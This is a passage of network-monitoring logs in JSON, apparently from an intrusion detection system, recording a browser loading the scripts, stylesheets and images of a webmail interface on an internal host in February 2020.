Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:01:17.204245+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.204602+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:01:17.204937+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.205221+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:01:17.207382+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:17.207751+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:01:17.208069+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.208265+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} 
{"timestamp":"2020-02-29T00:01:17.209288+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.209615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:01:17.210390+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.212241+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.212481+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} 
{"timestamp":"2020-02-29T00:01:17.213145+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.213800+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.219337+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.219999+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:01:17.222526+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.223043+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:01:17.253333+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:01:17.257292+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:01:17.257320+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:01:17.273323+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:01:17.276605+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.276888+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:01:17.279412+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.321425+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:01:17.365360+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.365830+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:01:17.380340+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.380862+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:01:17.380615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.380967+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.383893+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.384497+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:01:17.386531+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} 
{"timestamp":"2020-02-29T00:01:17.387940+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:01:17.389643+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.390218+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.395134+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.396041+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:01:17.396672+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
